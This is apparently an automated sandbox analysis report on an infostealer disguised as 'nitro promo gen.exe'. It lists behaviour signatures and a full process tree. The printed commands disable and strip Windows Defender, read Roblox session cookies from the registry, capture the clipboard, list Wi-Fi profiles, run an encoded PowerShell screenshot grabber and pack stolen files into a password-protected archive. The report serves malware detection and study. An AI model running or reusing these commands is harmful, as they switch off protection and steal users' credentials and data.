Resubmissions

10-12-2024 10:09

241210-l6rd8asqfv 10

10-12-2024 09:17

241210-k9df4askfx 10

Analysis

  • max time kernel
    139s
  • max time network
    149s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    10-12-2024 10:09

General

  • Target

    nitro promo gen.exe

  • Size

    7.5MB

  • MD5

    0ac63b6b7095d264a4abf2c1e6e53428

  • SHA1

    0aa150764147c6e03eb040b60cd170bac9bae5e8

  • SHA256

    c44661cb16943639da31332d39672902226c9f80851d5e7a3fa67aa3c6e35c9d

  • SHA512

    3a3968e5b23d2a3ec5210252b6516a741a13437a85296c82bb6c0b8214c5ba158b576a03dd330178aa9134939241e80466c360c0a390ce522d818f9530469852

  • SSDEEP

    196608:P+QCwVWurErvI9pWjgN3ZdahF0pbH1AY7WtQsNo/03vC1z:7VWurEUWjqeWx06rYYz

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • UPX packed file 60 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 32 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\nitro promo gen.exe
    "C:\Users\Admin\AppData\Local\Temp\nitro promo gen.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:404
    • C:\Users\Admin\AppData\Local\Temp\nitro promo gen.exe
      "C:\Users\Admin\AppData\Local\Temp\nitro promo gen.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2892
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\nitro promo gen.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:880
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\nitro promo gen.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4376
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3776
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1324
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4112
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:396
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3224
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic csproduct get uuid
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3332
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4392
        • C:\Windows\system32\reg.exe
          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
          4⤵
            PID:2836
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3324
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
            4⤵
              PID:884
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1080
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              • Suspicious use of AdjustPrivilegeToken
              PID:2608
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:436
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:4088
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4984
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3196
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2984
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:1092
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1176
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:2052
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4812
            • C:\Windows\System32\Wbem\WMIC.exe
              WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              4⤵
                PID:4192
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              3⤵
              • Clipboard Data
              PID:3904
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell Get-Clipboard
                4⤵
                • Clipboard Data
                • Suspicious behavior: EnumeratesProcesses
                PID:1936
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
                PID:4564
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  4⤵
                  • Enumerates processes with tasklist
                  PID:5012
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                3⤵
                • System Network Configuration Discovery: Wi-Fi Discovery
                PID:1528
                • C:\Windows\system32\netsh.exe
                  netsh wlan show profile
                  4⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Network Configuration Discovery: Wi-Fi Discovery
                  PID:2604
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                  PID:1448
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:4956
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "systeminfo"
                    3⤵
                      PID:2492
                      • C:\Windows\system32\systeminfo.exe
                        systeminfo
                        4⤵
                        • Gathers system information
                        PID:1476
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                      3⤵
                        PID:2612
                        • C:\Windows\system32\reg.exe
                          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                          4⤵
                            PID:2788
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                          3⤵
                            PID:2204
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                              4⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:1324
                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hnb1gf0s\hnb1gf0s.cmdline"
                                5⤵
                                  PID:2556
                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7D1F.tmp" "c:\Users\Admin\AppData\Local\Temp\hnb1gf0s\CSCF88EFBB620E54E48957EF87320DF2845.TMP"
                                    6⤵
                                      PID:2336
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                3⤵
                                  PID:800
                                  • C:\Windows\system32\attrib.exe
                                    attrib -r C:\Windows\System32\drivers\etc\hosts
                                    4⤵
                                    • Drops file in Drivers directory
                                    • Views/modifies file attributes
                                    PID:436
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  3⤵
                                    PID:1276
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      4⤵
                                        PID:552
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                      3⤵
                                        PID:2000
                                        • C:\Windows\system32\attrib.exe
                                          attrib +r C:\Windows\System32\drivers\etc\hosts
                                          4⤵
                                          • Drops file in Drivers directory
                                          • Views/modifies file attributes
                                          PID:2372
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                        3⤵
                                          PID:1124
                                          • C:\Windows\system32\tree.com
                                            tree /A /F
                                            4⤵
                                              PID:236
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                            3⤵
                                              PID:248
                                              • C:\Windows\system32\tasklist.exe
                                                tasklist /FO LIST
                                                4⤵
                                                • Enumerates processes with tasklist
                                                PID:3552
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                              3⤵
                                                PID:2420
                                                • C:\Windows\system32\tree.com
                                                  tree /A /F
                                                  4⤵
                                                    PID:5016
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                  3⤵
                                                    PID:1524
                                                    • C:\Windows\system32\tree.com
                                                      tree /A /F
                                                      4⤵
                                                        PID:468
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                      3⤵
                                                        PID:2612
                                                        • C:\Windows\system32\tree.com
                                                          tree /A /F
                                                          4⤵
                                                            PID:2240
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                          3⤵
                                                            PID:2744
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                              4⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:1276
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                            3⤵
                                                              PID:2096
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                4⤵
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:3120
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "getmac"
                                                              3⤵
                                                                PID:1048
                                                                • C:\Windows\system32\getmac.exe
                                                                  getmac
                                                                  4⤵
                                                                    PID:820
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI4042\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\pipXY.zip" *"
                                                                  3⤵
                                                                    PID:3920
                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI4042\rar.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\_MEI4042\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\pipXY.zip" *
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      PID:1940
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                    3⤵
                                                                      PID:4896
                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                        wmic os get Caption
                                                                        4⤵
                                                                          PID:848
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                        3⤵
                                                                          PID:1508
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            wmic computersystem get totalphysicalmemory
                                                                            4⤵
                                                                              PID:1668
